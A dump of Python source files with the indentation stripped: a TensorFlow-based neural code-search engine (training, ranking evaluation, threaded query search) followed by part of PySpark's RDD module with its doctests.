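#                             subscribe_cmd="pactl subscribe")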
|
main.py
|
import os
import sys
import random
import traceback
from tensorflow.keras.optimizers import RMSprop, Adam
from scipy.stats import rankdata
import math
import numpy as np
from tqdm import tqdm
import argparse
random.seed(42)
import threading
import configs
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO, format="%(asctime)s: %(name)s: %(levelname)s: %(message)s")
from utils import normalize, pad, convert, revert
import models, data_loader
class SearchEngine:
def __init__(self, args, conf=None):
self.data_path = args.data_path + args.dataset+'/'
self.train_params = conf.get('training_params', dict())
self.data_params = conf.get('data_params',dict())
self.model_params = conf.get('model_params',dict())
self._eval_sets = None
self._code_reprs = None
self._codebase = None
self._codebase_chunksize = 2000000
##### Model Loading / saving #####
def save_model(self, model, epoch):
model_path = f"./output/{model.__class__.__name__}/models/"
os.makedirs(model_path, exist_ok=True)
model.save(model_path + f"epo{epoch}_code.h5", model_path + f"epo{epoch}_desc.h5", overwrite=True)
def load_model(self, model, epoch):
model_path = f"./output/{model.__class__.__name__}/models/"
assert os.path.exists(model_path + f"epo{epoch}_code.h5"),f"Weights at epoch {epoch} not found"
assert os.path.exists(model_path + f"epo{epoch}_desc.h5"),f"Weights at epoch {epoch} not found"
model.load(model_path + f"epo{epoch}_code.h5", model_path + f"epo{epoch}_desc.h5")
##### Training #####
def train(self, model):
if self.train_params['reload']>0:
self.load_model(model, self.train_params['reload'])
valid_every = self.train_params.get('valid_every', None)
save_every = self.train_params.get('save_every', None)
batch_size = self.train_params.get('batch_size', 128)
nb_epoch = self.train_params.get('nb_epoch', 10)
split = self.train_params.get('validation_split', 0)
val_loss = {'loss': 1., 'epoch': 0}
chunk_size = self.train_params.get('chunk_size', 100000)
for i in range(self.train_params['reload']+1, nb_epoch):
print('Epoch %d :: \n' % i, end='')
logger.debug('loading data chunk..')
offset = (i-1)*self.train_params.get('chunk_size', 100000)
names = data_loader.load_hdf5(self.data_path+self.data_params['train_methname'], offset, chunk_size)
apis = data_loader.load_hdf5(self.data_path+self.data_params['train_apiseq'], offset, chunk_size)
tokens = data_loader.load_hdf5(self.data_path+self.data_params['train_tokens'], offset, chunk_size)
descs = data_loader.load_hdf5(self.data_path+self.data_params['train_desc'], offset, chunk_size)
logger.debug('padding data..')
methnames = pad(names, self.data_params['methname_len'])
apiseqs = pad(apis, self.data_params['apiseq_len'])
tokens = pad(tokens, self.data_params['tokens_len'])
good_descs = pad(descs,self.data_params['desc_len'])
bad_descs=[desc for desc in descs]
random.shuffle(bad_descs)
bad_descs = pad(bad_descs, self.data_params['desc_len'])
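# Note (comment added): the shuffled descriptions serve as negative samples, so
# the model is trained to rank a snippet's own description (good_descs) above a
# random one (bad_descs).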
hist = model.fit([methnames, apiseqs, tokens, good_descs, bad_descs], epochs=1, batch_size=batch_size, validation_split=split)
if hist.history['val_loss'][0] < val_loss['loss']:
val_loss = {'loss': hist.history['val_loss'][0], 'epoch': i}
print('Best: Loss = {}, Epoch = {}'.format(val_loss['loss'], val_loss['epoch']))
if save_every is not None and i % save_every == 0:
self.save_model(model, i)
if valid_every is not None and i % valid_every == 0:
acc, mrr, map, ndcg = self.valid(model, 1000, 1)
##### Evaluation in the develop set #####
def valid(self, model, poolsize, K):
"""
validate in a code pool.
param: poolsize - size of the code pool, if -1, load the whole test set
param: K - number of top results retrieved for each query
"""
def ACC(real,predict):
sum=0.0
for val in real:
try: index=predict.index(val)
except ValueError: index=-1
if index!=-1: sum=sum+1
return sum/float(len(real))
def MAP(real,predict):
sum=0.0
for id,val in enumerate(real):
try: index=predict.index(val)
except ValueError: index=-1
if index!=-1: sum=sum+(id+1)/float(index+1)
return sum/float(len(real))
def MRR(real,predict):
sum=0.0
for val in real:
try: index=predict.index(val)
except ValueError: index=-1
if index!=-1: sum=sum+1.0/float(index+1)
return sum/float(len(real))
def NDCG(real,predict):
dcg=0.0
idcg=IDCG(len(real))
for i,predictItem in enumerate(predict):
if predictItem in real:
itemRelevance=1
rank = i+1
dcg+=(math.pow(2,itemRelevance)-1.0)*(math.log(2)/math.log(rank+1))
return dcg/float(idcg)
def IDCG(n):
idcg=0
itemRelevance=1
for i in range(n):
idcg+=(math.pow(2, itemRelevance)-1.0)*(math.log(2)/math.log(i+2))
return idcg
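# Worked example (comment added): with real=[3] and predict=[7, 3, 5] the hit
# is at index 1, so ACC=1.0, MRR=0.5, MAP=0.5 and
# NDCG = (2**1 - 1) * log(2)/log(3) / IDCG(1) ~= 0.63.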
#load valid dataset
if self._eval_sets is None:
methnames = data_loader.load_hdf5(self.data_path+self.data_params['valid_methname'], 0, poolsize)
apiseqs= data_loader.load_hdf5(self.data_path+self.data_params['valid_apiseq'], 0, poolsize)
tokens = data_loader.load_hdf5(self.data_path+self.data_params['valid_tokens'], 0, poolsize)
descs = data_loader.load_hdf5(self.data_path+self.data_params['valid_desc'], 0, poolsize)
self._eval_sets={'methnames':methnames, 'apiseqs':apiseqs, 'tokens':tokens, 'descs':descs}
accs,mrrs,maps,ndcgs = [], [], [], []
data_len = len(self._eval_sets['descs'])
for i in tqdm(range(data_len)):
desc=self._eval_sets['descs'][i]#good desc
descs = pad([desc]*data_len,self.data_params['desc_len'])
methnames = pad(self._eval_sets['methnames'],self.data_params['methname_len'])
apiseqs= pad(self._eval_sets['apiseqs'],self.data_params['apiseq_len'])
tokens= pad(self._eval_sets['tokens'],self.data_params['tokens_len'])
n_results = K
sims = model.predict([methnames, apiseqs,tokens, descs], batch_size=data_len).flatten()
negsims= np.negative(sims)
predict = np.argpartition(negsims, kth=n_results-1)
predict = predict[:n_results]
predict = [int(k) for k in predict]
real=[i]
accs.append(ACC(real,predict))
mrrs.append(MRR(real,predict))
maps.append(MAP(real,predict))
ndcgs.append(NDCG(real,predict))
logger.info(f'ACC={np.mean(accs)}, MRR={np.mean(mrrs)}, MAP={np.mean(maps)}, nDCG={np.mean(ndcgs)}')
return np.mean(accs), np.mean(mrrs), np.mean(maps), np.mean(ndcgs)
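# Note on the evaluation protocol above (inferred from this method alone): each
# description i is scored against every snippet in the pool and the only
# relevant item is the snippet with the same index, i.e. real = [i]. ACC is the
# fraction of queries whose own snippet appears in the top-K, and because there
# is a single relevant item, MAP and MRR both reduce to 1/rank of that snippet.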
##### Compute Representation #####
def repr_code(self, model):
logger.info('Loading the use data ..')
methnames = data_loader.load_hdf5(self.data_path+self.data_params['use_methname'],0,-1)
apiseqs = data_loader.load_hdf5(self.data_path+self.data_params['use_apiseq'],0,-1)
tokens = data_loader.load_hdf5(self.data_path+self.data_params['use_tokens'],0,-1)
methnames = pad(methnames, self.data_params['methname_len'])
apiseqs = pad(apiseqs, self.data_params['apiseq_len'])
tokens = pad(tokens, self.data_params['tokens_len'])
logger.info('Representing code ..')
vecs= model.repr_code([methnames, apiseqs, tokens], batch_size=10000)
vecs = vecs.astype(float)  # np.float is a deprecated alias for the builtin float
vecs= normalize(vecs)
return vecs
def search(self, model, vocab, query, n_results=10):
desc=[convert(vocab, query)]#convert desc sentence to word indices
padded_desc = pad(desc, self.data_params['desc_len'])
desc_repr=model.repr_desc([padded_desc])
desc_repr=desc_repr.astype(np.float32)
desc_repr = normalize(desc_repr).T # [dim x 1]
codes, sims = [], []
threads=[]
for i,code_reprs_chunk in enumerate(self._code_reprs):
t = threading.Thread(target=self.search_thread, args = (codes,sims,desc_repr,code_reprs_chunk,i,n_results))
threads.append(t)
for t in threads:
t.start()
for t in threads:#wait until all sub-threads finish
t.join()
return codes,sims
def search_thread(self, codes, sims, desc_repr, code_reprs, i, n_results):
#1. compute similarity
chunk_sims=np.dot(code_reprs, desc_repr) # [pool_size x 1]
chunk_sims = np.squeeze(chunk_sims, axis=1)
#2. choose top results
negsims=np.negative(chunk_sims)
maxinds = np.argpartition(negsims, kth=n_results-1)
maxinds = maxinds[:n_results]
chunk_codes = [self._codebase[i][k] for k in maxinds]
chunk_sims = chunk_sims[maxinds]
codes.extend(chunk_codes)
sims.extend(chunk_sims)
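# Hedged illustration of the top-k selection used above: np.argpartition on the
# negated similarities moves the n_results highest-scoring indices (in arbitrary
# order) into the first n_results slots, which avoids a full sort of the pool.
#   >>> import numpy as np                          # illustrative only
#   >>> sims = np.array([0.1, 0.9, 0.4, 0.7])
#   >>> top2 = np.argpartition(-sims, kth=1)[:2]
#   >>> sorted(top2.tolist())
#   [1, 3]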
def postproc(self,codes_sims):
codes_, sims_ = zip(*codes_sims)
codes= [code for code in codes_]
sims= [sim for sim in sims_]
final_codes=[]
final_sims=[]
n=len(codes_sims)
for i in range(n):
is_dup=False
for j in range(i):
if codes[i][:80]==codes[j][:80] and abs(sims[i]-sims[j])<0.01:
is_dup=True
if not is_dup:
final_codes.append(codes[i])
final_sims.append(sims[i])
return zip(final_codes,final_sims)
def parse_args():
parser = argparse.ArgumentParser("Train and Test Code Search(Embedding) Model")
parser.add_argument("--data_path", type=str, default='./data/', help="working directory")
parser.add_argument("--model", type=str, default="JointEmbeddingModel", help="model name")
parser.add_argument("--dataset", type=str, default="github", help="dataset name")
parser.add_argument("--mode", choices=["train","eval","repr_code","search"], default='train',
help="The mode to run. The `train` mode trains a model;"
" the `eval` mode evaluat models in a test set "
" The `repr_code/repr_desc` mode computes vectors"
" for a code snippet or a natural language description with a trained model.")
parser.add_argument("--verbose",action="store_true", default=True, help="Be verbose")
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
config=getattr(configs, 'config_'+args.model)()
engine = SearchEngine(args, config)
##### Define model ######
logger.info('Build Model')
model = getattr(models, args.model)(config)#initialize the model
model.build()
model.summary(export_path = f"./output/{args.model}/")
optimizer = config.get('training_params', dict()).get('optimizer', 'adam')
model.compile(optimizer=optimizer)
data_path = args.data_path+args.dataset+'/'
if args.mode=='train':
engine.train(model)
elif args.mode=='eval': # evaluate for a specific epoch
if config['training_params']['reload']>0:
engine.load_model(model, config['training_params']['reload'])
engine.eval(model, -1, 10)
elif args.mode=='repr_code':
if config['training_params']['reload']>0:
engine.load_model(model, config['training_params']['reload'])
vecs = engine.repr_code(model)
data_loader.save_code_reprs(vecs, data_path+config['data_params']['use_codevecs'])
elif args.mode=='search':
#search code based on a desc
if config['training_params']['reload']>0:
engine.load_model(model, config['training_params']['reload'])
engine._code_reprs = data_loader.load_code_reprs(data_path+config['data_params']['use_codevecs'], engine._codebase_chunksize)
engine._codebase = data_loader.load_codebase(data_path+config['data_params']['use_codebase'], engine._codebase_chunksize)
vocab = data_loader.load_pickle(data_path+config['data_params']['vocab_desc'])
while True:
try:
query = input('Input Query: ')
n_results = int(input('How many results? '))
except Exception:
print("Exception while parsing your input:")
traceback.print_exc()
break
query = query.lower().replace('how to ', '').replace('how do i ', '').replace('how can i ', '').replace('?', '').strip()
codes,sims=engine.search(model, vocab, query, n_results)
zipped=zip(codes,sims)
zipped=sorted(zipped, reverse=True, key=lambda x:x[1])
zipped=engine.postproc(zipped)
zipped = list(zipped)[:n_results]
results = '\n\n'.join(map(str, zipped)) # combine the results into a single display string
print(results)
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
from collections import defaultdict
from itertools import chain, ifilter, imap
import operator
import sys
import shlex
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
import warnings
import heapq
import bisect
import random
import socket
from math import sqrt, log, isinf, isnan, pow, ceil
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, \
get_used_memory, ExternalSorter
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
# TODO: for Python 3.3+, PYTHONHASHSEED should be reset to disable randomized
# hash for string
def portable_hash(x):
"""
This function returns a consistent hash code for builtin types, especially
for None and tuples containing None.
The algorithm is similar to the one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxint
h ^= len(x)
if h == -1:
h = -2
return h
return hash(x)
class BoundedFloat(float):
"""
A bounded value is generated by an approximate job, with a confidence level
and low and high bounds.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1] not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = socket.socket()
sock.settimeout(3)
try:
sock.connect(("localhost", port))
rf = sock.makefile("rb", 65536)
for item in serializer.load_stream(rf):
yield item
finally:
sock.close()
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY_SER):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY_SER}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return imap(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(imap(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return ifilter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda (x, _): x)
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
>>> rdd = sc.parallelize(range(100), 4)
>>> rdd.sample(False, 0.1, 81).count()
10
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(5), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> rdd1.collect()
[1, 3]
>>> rdd2.collect()
[0, 2, 4]
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
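# Sketch of how the weights become sampling ranges (taken from the cweights
# computation above): weights [2, 3] give cumulative bounds [0.0, 0.4, 1.0], so
# the first split keeps elements whose seeded uniform draw falls in [0.0, 0.4)
# and the second keeps [0.4, 1.0); every element lands in exactly one split.
#   s = 2 + 3; cweights = [0.0, 2/s, 5/s]  ->  [0.0, 0.4, 1.0]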
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxint - int(numStDev * sqrt(sys.maxint))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxint)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
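# Worked example of the bound above (numbers are illustrative only): drawing
# num=100 from total=10000 without replacement gives fraction p = 0.01 and
# gamma = -log(5e-5)/10000 ~= 9.9e-4, so the method returns roughly
# 0.01 + 9.9e-4 + sqrt(gamma**2 + 2*gamma*0.01) ~= 0.0155, i.e. we oversample
# by about 55% so that an undersized sample is extremely unlikely.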
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda (k, vs): all(vs)) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower() == "true")
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda (k, v): keyfunc(k), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower() == 'true')
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda (k, v): keyfunc(k), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda (k, v): k).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[len(samples) * (i + 1) / numPartitions]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
